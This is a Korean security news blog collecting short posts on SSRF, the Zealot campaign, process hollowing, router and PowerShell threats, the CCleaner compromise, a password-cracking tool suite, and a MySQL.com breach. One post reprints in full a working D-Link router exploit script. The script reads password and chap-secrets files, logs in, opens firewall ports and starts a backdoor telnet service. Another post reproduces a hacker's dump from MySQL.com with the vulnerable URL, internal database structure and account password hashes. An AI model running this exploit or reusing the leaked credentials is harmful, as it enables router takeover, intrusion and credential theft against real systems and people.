웹 해킹 공격에서 자주 언급되는 사항이 Injection 류라고 볼 수 있지만, RF(Request Forgery) 또한 다양한 형태로 나타나고 있습니다. 대표적인 예가 CSRF(Cross-site Request Forgery)를 들 수 있습니다.

 

SSRF(Server-side Request Forgery)는 CSRF와 유사한 형태이지만 클라이언트가 아닌 서버를 직접 호출한다는 점에서 남다른 의미가 있습니다.

 

 

즉, 인터넷에서 내부에 위치한 서버등을 접속할 때 방화벽과 같은 보안 장비를 우회하고 침입하여 내부의 중요한 리소스에 접근할 수 있다는 가능성을 내포하고 있습니다.

 

예전부터 연구 대상이었지만, 취약점이 인트라넷이나 그런 쪽이 아닌 웹서버 자체에 대한 취약점을 이용하기 때문에 그리 주목받지는 못했습니다.

 

올해 블랙햇 USA 2017에서 SSRF에 대한 새로운 기법이 소개되었는데, 자세한 사항은 아래 동영상을 참고하십시오.

 

각설하고, 지금 소개하는 자료는 SSRF를 통해 실제적으로 내부 인트라넷에 접근하는 방법에 대해 기술적 자료입니다.

 

요약: 이 문서는 SSRF 검증, 인트라넷 호스트/포트 스캐닝, 지원하는 프로토콜 검증, 자동 공격 등에 대한 전반적인 프로세스를 담고 있습니다. 또한, SSRF를 프로시로 사용하여 W3af, sqlmap, Burpsuite와 같은 공격도구로 활용하는 방법도 소개합니다.

 

 

 

reTweet
Posted by 문스랩닷컴
blog comments powered by Disqus

    글로벌 보안 기업인 F5에서 아파치 스트럿 취약점을 이용하는 공격 행태를 공개했습니다. 이 공격은 다단계로 이뤄져 있으며 NSA가 주도하는 EternalBlue 와 EternalSynergy 익스플로잇을 통해 내부 네트워크를 노립니다. F5에서는 이 공격을 "질럿(Zealt)"이라고 칭했으며, 이는 파이썬 스크립트가 포함된 압축파일(ZIP)에서 따온 말이라고 합니다. 질럿 공격을 요약하면 다음과 같습니다.

     

    • 목표: 윈도 및 리눅스 시스템
    • 공격 방식: 다단계로 이뤄진 복잡한 공격 형태
    • 이용하는 취약점
      • CVE-2017-5638 - Apache Struts Jakarta Multipart Parser 공격
      • CVE-2017-9822 - DotNetNuke(DNN) content management system 취약점
    • 내부 네트워크로 잠입을 시도하기 위해 EnteralBlue와 EntenalSynergy 익스플로잇 활용
    • 윈도우에서는 파워쉘, 리눅스에서는 파이선 에이전트를 활용하며, 난독화되어 있음. EmpireProject post-exploitation 프레임워크로 추정됨
    • 사이버 범죄 시장에서 인기를 누리고 있는 Monero 가상 화폐 채굴

    보다 자세한 사항은 아래 링크를 참고하세요.

     

     

    고맙습니다.

     

    reTweet
    Posted by 문스랩닷컴
    blog comments powered by Disqus

      악성코드 제작자가 고민하는 주제 중의 하나가 바로, 백신에 탐지되지 않고 어떻게 잘 실행될 수 있도록 숨기는 방법이다. 가장 널리 쓰이는 방법은 루트킷과 같이 커널 드라이버로 위장하는 방법이 있는데, 이를 위해서는 고난이도의 개발 능력이 수반되어야 한다

       

      따라서, 손쉽게 이용하는 방법이 바로 정상적으로 프로세스 내에 숨기는 방법으로 보통 RAT(Remote Admin. Tool)에서 주로 사용한다.

       

      이 방법은, 윈도우의 정상적으로 프로세스 하나를 쩜 찍어서, 새로운 인스턴스로 휴면 상태로 실행시킨 후에 코드의 실행 위치를 악성코드의 위치로 바꿔치기 하는 방법이다.

       

       

       

      해외에 이러한 숨김 기법에 대한 강좌가 있어 소개한다.

       

      reTweet
      Posted by 문스랩닷컴
      blog comments powered by Disqus

        가정에서 인터넷을 사용할 경우에는 대부분 공유기(그것도 대부분 무선)를 이용하여 여러 대가 접속하여 이용하곤 한다.

         

        이러한 공유기는 작은 형태의 리눅스와 같은 펌웨어를 이용하고, 관리 편의를 위해 웹페이지를 제공하는 경우가 많다.

         

        문제는 웹페이지 즉 웹서비스 자체에도 취약점이 많이 있고, 펌웨어에도 상당히 많은 취약점이 있다.

         

        아래 자료는 TP-LINK의 WR940N이라는 공유기 모델을 해킹하는 방법을 소개한다.

         

         

        참고로, 국내에서는 KISA가 국내 공유기 제조사와 협의하여, 지속적으로 펌웨어의 업그레이드를 유도하고 있다는 점에서 칭찬받을 만한 좋은 사례이다.

         

        reTweet
        Posted by 문스랩닷컴
        blog comments powered by Disqus

          해커(나쁜 의미는 아니지만, 대부분 그렇게 쓰니까)가해킹 및 악성코드를 유포하는 방식에도 다양한 변화가 오고 있다.

           

          단순히 파일을 게시판, P2P에서 배포하는 방식부터, 국내에 특화된 Active-X 모듈에 기생해서 전파하는 방법, 웹사이트 방문만으로도 악성코드 감염에 노출되는 드라이브바이다운로드 기법.

           

          이제 최근 2-3년전부터 스크립트에 대한 우려가 제기되고 있었으며, 이제 본격적으로 공격의 약발이 먹히는지, 심지어 파일이 없는 악성코드(Fileless Malware)에도 이용되고 있다.

           

          해외 자료 중에서  윈도우 운영체제에서 지원하는 파워쉘(Powershell)에 대한 좋은 자료가 있어 간단히 소개한다.

           

          reTweet
          Posted by 문스랩닷컴
          blog comments powered by Disqus

            지난 9월 중순에는 어베스트에 인수된 피리폼(Piriform) 사의 CCleaner 제품에 대한 설치파일 변조 이슈가 발생했습니다. 이와 관련하여 어베스트 위협연구소에서는 악성코드, C&C 서버, 공격자에 대한 추적 등 다양한 이야기를 블로그에 소개하고 있습니다.

             

            1. 해킹 소식 발표

             

             

            2. 추적기 1탄

             

             

            3. 추적기 2탄

             

             

            2탄을 읽어보면, 공격자의 실수라든지, 공격자를 숨기기 위해 사용한 흔적 등, 흥미진진한 부분이 상당히 나옵니다. 관심있으신 분들은 한번 분석해 보시는 것도 추천!

             

            고맙습니다.

            reTweet
            Posted by 문스랩닷컴
            blog comments powered by Disqus

              엔드포인트(Endpoint)는 네트워크 맨 끝부분에 연결된 장비를 의미하며, 대표적으로 PC, 스마트폰 등을 들 수 있다. 따라서 보통 기업이나 보안 솔루션의 입장에서는 엔트포인트 프로텍션이라고 하는 용어를 통해 보호할 수 있다고 표현하기도 한다.


              하지만, 실제로 PC나 모바일 장비의 경우 어느정도 보안 솔루션이 제공되고 이를 통해 대부분의 위협을 예방 및 해결할 수 있다.


              하지만, 가정이나 조그만 회사(SOHO)에서 볼 때 간과되고 있는 부분이 있는데 바로 홈엔드포인트(이 용어는 필자가 엔드포인트라는 기존의 의미와 구별하기 위해 세계 최초로 사용한 단어... 는 아님)


              대표적인 예를 들면, 집과 같은 작은 네트워크에서 사용하는 라우터(IP 공유기, AP 등), NAS와 같은 스토리지, 애플TV와 같은 미디어 관련 장치 그리고 네트워크 프린터 등을 들 수 있다.


              피해사례를 열거해 보면,


              * 라우터 : 내부 네트워크 침입, 라우터의 취약점을 통한 대규모 DDoS 등 공격 유발 가능성.

              * NAS: 내부 정보(사진, 동영상(!) ) 유출

              * 네트워크 프린터: 내부 정보 유출


              우리가 보통 많이 사용하는 IP 공유기는 실제로 몇만원 짜리를 사용하고 있으며, 제품의 가격과 동일하게(!) 보안적 측면이 매우 간과되어 있는 경우가 많다. 물론, 보안 전문 업체가 개발 판매하는 제품은 어느정도 신뢰할 수 있지만, 실제 가정에서는 사용하는 경우가 없다!


              아래 자료는 D-Link 사에서 판매하는 라우터 제품의 취약점이 공개된 사례로, DIR-300 시리지의 전체 펌웨어, DIR-600 시리즈 전체, DIR-615(펌웨어 4.0 버전) 등에서 동작하는 공격 코드이다.


              General info:
              =============
              A lot have been already said about SOHO routers. Thus, without further ado another nail in the coffin.

              knock knock
              ===========
              -- cut
              #!/bin/sh


              if [ -z "$1" ]; then
                      echo "d-link DIR-300 (all), DIR-600 (all), DIR-615 (fw 4.0)";
                      echo "exploited by AKAT-1, 22733db72ab3ed94b5f8a1ffcde850251fe6f466, c8e74ebd8392fda4788179f9a02bb49337638e7b";
                      echo "usage: $0 [router address] [telnet port]";
                      exit 0;
              fi;

              if [ -z "$2" ]; then
                      TPORT=3333;
              else
                      TPORT=$2;
              fi

              UPORT=31337;

              echo "Trying $1 ...";

              HTTPASSWD=`curl -sS "http://$1/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd" | grep -A1 "<center>" | tail -1 | sed -e "s/\t//g ; s/^\([^:]*\):\([^:]*\)$/\1\n \2/g"`;

              if [ ! -z "$HTTPASSWD" ]; then
                      L=`echo $HTTPASSWD | cut -d' ' -f1`;
                      P=`echo $HTTPASSWD | cut -d' ' -f2`;

                      echo "found username: $L";
                      echo "found password: $P";


                      curl -d "ACTION_POST=LOGIN&LOGIN_USER=$L&LOGIN_PASSWD=$P" -sS "http://$1/login.php" | grep -v "fail" 1>/dev/null;

                      if [ $? -eq 0 ]; then
                              curl -sS "http://$1/tools_system.xgi?random_num=2011.9.22.13.59.33&exeshell=../../../../usr/sbin/iptables -t nat -A PRE_MISC -i eth0.2 -p tcp --dport $TPORT -j ACCEPT&set/runtime/syslog/sendmail=1" 1>/dev/null;
                              curl -sS "http://$1/tools_system.xgi?random_num=2011.9.22.13.59.33&exeshell=../../../../usr/sbin/iptables -t nat -A PRE_MISC -i eth0.2 -p tcp --dport $UPORT -j ACCEPT&set/runtime/syslog/sendmail=1" 1>/dev/null;
                              curl -sS "http://$1/tools_system.xgi?random_num=2011.9.22.13.59.33&exeshell=../../../../usr/sbin/telnetd -p $TPORT -l /usr/sbin/login -u hacked:me&set/runtime/syslog/sendmail=1" 1>/dev/null;

                              echo "if you are lucky telnet is listening on $TPORT (hacked:me) ..."
                              curl -sS "http://$1/logout.php" 1>/dev/null;
                      fi
              fi

              CHAP=`curl -sS "http://$1/model/__show_info.php?REQUIRE_FILE=/etc/ppp/chap-secrets" | grep -A1 "<center>" | sed -e "s/<center>//g"`;

              if [ ! -z "$CHAP" ]; then
                      echo "found chap-secrets: $CHAP";
              fi

              echo "Bye bye.";

              exit 0;

              -- cut

              Credits:
              ========
              echo $use_the_source_luke

              ____________________________________________________________
              FREE 3D MARINE AQUARIUM SCREENSAVER - Watch dolphins, sharks & orcas on your desktop!

              Check it out at http://www.inbox.com/marineaquarium


              이제는 좀더 신경써야 할 부분이 더 늘어나고 있다. 가장 좋은 방안은 선을 끊는 것이 아닐까?



              reTweet
              Posted by 문스랩닷컴
              blog comments powered by Disqus
                소프트웨어에서 사용하는 비밀번호를 크랙해 주는 프로그램만을 몽땅 모은 SXPasswordSuite가 최신버전 v4.5를 출시했습니다. 지원하는 프로그램은 다음과 같으며 약 50여가지 소프트웨어를 지원합니다.

                • AsteriskPasswordSpy
                • BrowserPasswordDecryptor
                • FacebookPasswordDecryptor
                • FireMaster
                • FireMasterLinux
                • FTPPasswordDecryptor
                • FTPPasswordSniffer
                • GooglePasswordDecryptor
                • IDMPasswordDecryptor
                • iTunesPasswordDecryptor
                • MailPasswordDecryptor
                • MessengerPasswordDecryptor
                • MyspacePasswordDecryptor
                • MysqlPasswordAuditor
                • NetworkPasswordDecryptor
                • OraclePasswordAuditor
                • OrbitPasswordDecryptor
                • TwitterPasswordDecryptor
                • YahooPasswordDecryptor

                지원하는 운영체제는 윈도우 XP부터 윈도우 7까지 다양하며, 다음 링크에서 자세한 정보 및 다운로드할 수 있습니다.

                http://securityxploded.com/sxpasswordsuite.php 
                reTweet
                Posted by 문스랩닷컴
                blog comments powered by Disqus

                  MySQL 데이터베이스의 공식 홈페이지인 MySQL.com 홈페이지가 SQL 인젝션 취약점을 통해 해킹되어 계정 정보가 누출되는 사고가 발생했습니다. 

                  특히 Blind SQL 인젝션 공격은 공격자가 별다른 작업을 수행하지 않아도 자동적으로 공격을 수행하고 그 결과 데이터베이스의 정보까지 빼낼 수 있습니다.

                  Vulnerable Target : http://mysql.com/customers/view/index.html?id=1170
                  Host IP : 213.136.52.29
                  Web Server : Apache/2.2.15 (Fedora)
                  Powered-by : PHP/5.2.13
                  Injection Type : MySQL Blind
                  Current DB : web

                  더욱 문제가 되는 것은 이 취약점을 이용하여 빼낸 각종 정보가 인터넷 상에 공개되어 있으며, 간단한 비밀번호를 가진 계정은 해킹되어 있으며, 다른 계정 정보도 해독 프로그램을 이용하여 열심히 풀고 있다는 것입니다.

                  Data Bases:    
                  
                  information_schema
                  bk
                  certification
                  c?ashme
                  cust_sync_interim
                  customer
                  dbasavings
                  downloads
                  feedback
                  glassfish_interface
                  intranet
                  kaj
                  license_customers
                  manual
                  manual_search
                  mem
                  mysql
                  mysqlforge
                  mysqlweb
                  news_events
                  partner_t?aining
                  partners
                  partners_bak
                  phorum5
                  planetmysql
                  qa_contribution
                  quickpoll
                  robin
                  rp
                  sampo
                  sampo_interface
                  sessions
                  softrax
                  softrax_interim
                  solutions
                  tco
                  test
                  track
                  track_refer
                  wb
                  web
                  web_control
                  web_projects
                  web_training
                  webwiki
                  wordpress
                  zack
                  
                  Current DB: web
                  
                  Tables
                  
                  xing_validation        
                  v_web_submissions      
                  userbk 
                  user_extra     
                  
                  user  Columns: cwpid version lead_quality sfid industry address2 created last_modified lang notify newsletter gid title 
                  fax cell phone country zipcode state city address business company position lastname firstname passwd verified bounces 
                  email user_id
                  
                  us_zip_state   
                  us_area_state  
                  unsub_log      
                  trials 
                  trial_external_log     
                  trial_data     
                  trial_alias    
                  training_redirect      
                  tag_blacklist  
                  tag_applied    
                  tag    
                  support_feeds_DROP     
                  support_entries_DROP   
                  states 
                  snapshots_builds       
                  snapshots      
                  sakilapoints   
                  regions        
                  quote_customer 
                  quote  
                  quicklinks     
                  promo  
                  product_releases       
                  position       
                  partner        
                  paper_lead     
                  paper_details_options  
                  paper_details_old      
                  paper_details  
                  paper  
                  newsletter_unsub       
                  nav_sites      
                  nav_items      
                  mysql_history  
                  mirror_status  
                  mirror_country 
                  mirror_continent       
                  mirror 
                  mailing_list_member    
                  mailing_list   
                  locks  
                  lead_validity_rules    
                  lead_source_xref       
                  lead_source_external   
                  lead_source    
                  lead_routing_rule      
                  lead_rep       
                  lead_old       
                  lead_note      
                  lead_extra_old 
                  lead_extra_new 
                  lead_extra     
                  lead_companies 
                  lead_campaign_member   
                  lead   
                  language_strings       
                  language_modules       
                  imagecache     
                  hall_of_fame   
                  g_search_term  
                  g_search_data  
                  g_blog_data    
                  forum_comment  
                  forms  
                  field_xref     
                  field_options  
                  field_match    
                  email_blacklist        
                  email_a_friend 
                  drpl_manual_review     
                  drpl_denied    
                  drpl_check_log 
                  drpl_cache     
                  customer_meta_sets     
                  customer_meta_set      
                  customer_meta  
                  customer       
                  coupon_product 
                  coupon_campaign_attribute      
                  coupon_campaign        
                  coupon 
                  country        
                  countries      
                  campaign_type  
                  campaign_topic 
                  campaign_score 
                  campaign_listdata      
                  campaign_detail        
                  business       
                  bounces        
                  
                  Database : mysql
                  Table:
                  
                  user_info    
                  
                  user     Column: Update_pri Insert_priv Select_priv Password User Host
                  
                  time_zone_transition_type    
                  time_zone_transition    
                  time_zone_name    
                  time_zone_leap_second    
                  time_zone    
                  tables_priv    
                  slow_log    
                  ?ervers    
                  procs_priv    
                  proc    
                  plugin    
                  ndb_binlog_index    
                  inventory    
                  host    
                  help_topic    
                  help_relation    
                  help_keyword    
                  help_category    
                  general_log    
                  func    
                  event    
                  db    
                  columns_priv
                  
                  
                  # mysql.user Data
                  
                  Password                                      User            Host
                                                                  wembaster     %
                                                              monitor     10.%
                                                              sys             %
                                                              sys             localhost
                  *06581D0A5474DFF4D5DA3CE0CD7702FA52601412     forumread     %
                  *0702AEBF8E92A002E95D40247776E1A67CD2CA3F     wb             %
                  *2A57F767D29295B3CB8D01C760D9939649483F85     flipper     10.%
                  *32F623705BFFFE682E7BD18D5357B38EF8A5BAA9     wordpress     %
                  *66A905D4110DF14B41D585FDBCE0666AD13DD8C1     nagios             %
                  *704EB56151317F27573BB4DDA98EDF00FFABAAF8     root             localhost
                  *ED1BDC19B08FD41017EE180169E5CEB2C77F941A     mysqlforge     %
                  *FD75B177FFEC3590FE5D7E8459B3DDC60AE8147B     webleads     10.%
                  00680dd718880337                             olof             %
                  077f61a849269b62     qa_r     %
                  077f61a849269b62     qa_rw     %
                  077f61a849269b62     qa_adm     %
                  0c2f46ba6b87d4ea     trials_admin     10.%
                  1856b9b03b5a6f47     cacti     %
                  19519e95545509b5     certification     %
                  1a39dcad63bbc7a6     gf_mschiff     %
                  2277fd7d562ec459     webslave     localhost
                  2277fd7d562ec459     webslave     %
                  304404b114b5516c     planetmysql_rw     %
                  35e376451a87adb0     planetmysql_ro     %
                  4e203d581b756a93     webmaster     localhost
                  4e203d581b756a93     webmaster     %
                  4e93479179a8ec93     sysadm     %
                  575ec47e16c7e20e     phorum5     %
                  575ec47e16c7e20e     lenz     %
                  5f340ec40a706f64     robin     %
                  61113da02d2c97a5     regdata     %
                  616075f256f111ba     myadmin     10.100.6.44
                  61711eea3de509ac     merlin     127.0.0.1
                  6302de0909a369a1     ebraswell     %
                  6b72b2824cc7f6fe     mysqlweb     %
                  6ffd2b17498cdd44     zack     %
                  70599cf351c6f591     repl     %
                  740284817e3ed5a8     webwiki     %
                  74c5529b41a97cc2     web_projects    
                  
                  Databsae: web_control
                  
                  Table:
                  system    
                  system_command    
                  service_request    
                  run_control    
                  request_daemon    
                  rebuild_server    
                  rebuild_queue    
                  rebuild_control    
                  quarterly_lead_report    
                  newsletter_log    
                  newsletter_control    
                  ips    
                  hosts  Columns:notes description name
                  dns_servers Columns: name internal ip
                  
                  
                  Database: certification
                  
                  Tables:
                  signup    
                  corpcustomers    
                  certexamdata    
                  certcandidatedata    
                  certaccess
                  
                  
                  Database: wordpress
                  
                  Tables:
                  
                  wp_4_term_taxonom    
                  wp_4_term_relationships    
                  wp_4_posts    
                  wp_4_postmeta    
                  wp_4_options    
                  wp_4_links    
                  wp_4_comments    
                  wp_3_terms    
                  wp_3_term_taxonomy    
                  wp_3_term_relationships    
                  wp_3_posts    
                  wp_3_postmeta    
                  wp_3_options    
                  wp_3_links    
                  wp_3_comments    
                  wp_2_terms    
                  wp_2_term_taxonomy    
                  wp_2_term_relationships    
                  wp_2_posts    
                  wp_2_postmeta    
                  wp_2_options    
                  wp_2_links    
                  wp_2_comments    
                  wp_1_terms    
                  wp_1_term_taxonomy    
                  wp_1_term_relationships    
                  wp_1_posts    
                  wp_1_postmeta    
                  wp_1_options    
                  wp_1_links    
                  wp_1_comments    
                  wp_11_terms    
                  wp_11_term_taxonomy    
                  wp_11_term_relationships    
                  wp_11_posts    
                  wp_11_postmeta    
                  wp_11_options    
                  wp_11_links    
                  wp_11_comments    
                  wp_10_terms    
                  wp_10_term_taxonomy    
                  wp_10_term_relationships    
                  wp_10_posts    
                  wp_10_postmeta    
                  wp_10_options    
                  wp_10_links    
                  wp_10_comments    
                  remove_queries
                  
                  
                  
                  Database: bk
                  
                  Table:
                  wp_backupterm_taxonomy    
                  wp_backupterm_relationships    
                  wp_backupposts    
                  wp_backuppostmeta    
                  wp_backupoptions    
                  wp_backuplinks    
                  wp_backupcomments
                  
                  
                  -----------------------------------------------------------------------------------
                  Signed : Jackh4xor ! 
                  
                  Greetz : rooto, Mr.52, zone-hacker, w4ck1ng
                  
                  (In)Security


                  감사합니다.

                  reTweet
                  Posted by 문스랩닷컴
                  blog comments powered by Disqus
                    태국의 외교부 및 대사관 홈페이지가 현재 해킹된 상태이며 의약품에 관련된 많은 스팸을 발송하는데 이용되고 있는 것으로 알려지고 있습니다.


                    구글의 검색 엔진에서 해당 홈페이지에서 유포되고 있는 스팸 페이지를 보면, 약 56만 2,000여개가 됩니다.


                    감사합니다.

                    출처: http://blog.sucuri.net/2011/02/thailand-official-foreign-affairs-embassy-web-sites-hacked.html?utm_medium=twitter&utm_campaign=winsec&utm_source=%40winsec
                    reTweet
                    Posted by 문스랩닷컴
                    blog comments powered by Disqus


                      Web Analytics Blogs Directory